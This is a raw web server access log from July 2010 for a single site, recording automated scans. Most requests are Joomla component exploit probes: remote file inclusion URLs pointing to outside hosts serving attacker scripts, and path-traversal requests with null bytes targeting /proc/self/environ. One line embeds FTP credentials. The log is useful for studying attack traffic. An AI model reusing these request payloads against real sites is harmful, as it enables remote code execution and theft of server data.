222.236.47.182 - - [02/Jul/2010:17:30:57 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:17:30:59 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:42:18 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:42:18 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:42:18 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
91.214.44.123 - - [02/Jul/2010:17:44:30 -0700] "GET /logs/access.log HTTP/1.0" 200 375742 "http://www.elfagr.net/logs/access.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:44:39 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:44:49 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:44:39 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:44:53 -0700] "GET /logs//*?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:44:53 -0700] "GET /*?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:45:10 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:45:10 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:45:10 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:45:29 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.76" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:45:29 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.76" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:48:51 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:48:51 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:48:51 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:49:52 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:49:52 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:49:52 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:50:12 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:50:12 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:50:12 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:50:17 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:50:53 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.76" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:51:03 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.76" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:51:08 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:51:08 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:51:18 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:51:15 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
212.227.22.90 - - [02/Jul/2010:17:51:15 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:54 -0700] "GET /logs/access_100218.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:43 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:43 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:48 -0700] "GET /logs/access_100218.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:48 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
77.222.34.35 - - [02/Jul/2010:17:51:48 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:52:07 -0700] "GET /logs/access_100218.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:52:18 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:52:18 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:17:52:25 -0700] "GET /logs/access_100325.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:52:51 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:52:51 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:53:02 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:54:36 -0700] "GET /logs/access_100218.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:54:25 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.67.73 - - [02/Jul/2010:17:54:25 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:56:44 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:56:34 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:56:34 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:57:49 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:57:59 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:57:49 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:58:44 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:58:44 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:58:44 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:02:25 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:02:35 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:02:35 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:05:47 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:05:47 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:05:47 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:09:57 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:10:08 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:09:58 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:12:15 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:12:04 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:12:04 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:13:01 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:18:13:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:18:13:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:16:27 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:16:37 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:18:16:27 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:20:03 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:20:13 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:20:13 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
66.249.65.59 - - [02/Jul/2010:18:22:16 -0700] "GET /logs/access_091112.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:44:36 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:44:36 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:44:36 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:18:46:13 -0700] "GET /logs/access_100624.log HTTP/1.1" 200 3168634 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:18:46:53 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:16 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:26 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:16 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:26 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:37 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:18:51:37 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:03:11 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:03:11 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:03:11 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
91.121.67.226 - - [02/Jul/2010:19:12:21 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
87.229.111.44 - - [02/Jul/2010:19:12:35 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
87.229.111.44 - - [02/Jul/2010:19:12:45 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
87.229.111.44 - - [02/Jul/2010:19:12:45 -0700] "GET /logs/access_091119.log//components/com_simpleboard/image_upload.php?sbp=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
78.41.233.128 - - [02/Jul/2010:19:15:04 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.56.132.254 - - [02/Jul/2010:19:17:53 -0700] "GET /logs/access_091112.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/up.php? HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
187.56.132.254 - - [02/Jul/2010:19:18:03 -0700] "GET /logs/access_091126.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/up.php? HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
187.56.132.254 - - [02/Jul/2010:19:17:54 -0700] "GET /logs/access_100107.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/up.php? HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
91.121.67.226 - - [02/Jul/2010:19:22:11 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [02/Jul/2010:19:22:12 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [02/Jul/2010:19:22:22 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:23:16 -0700] "GET /logs/access.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:23:16 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:23:16 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
78.41.233.128 - - [02/Jul/2010:19:23:31 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [02/Jul/2010:19:23:21 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [02/Jul/2010:19:23:21 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
91.121.67.226 - - [02/Jul/2010:19:24:07 -0700] "GET /logs/access_100204.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
78.41.233.128 - - [02/Jul/2010:19:25:11 -0700] "GET /logs/access_100204.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:25:26 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:25:16 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:26:57 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:26:57 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
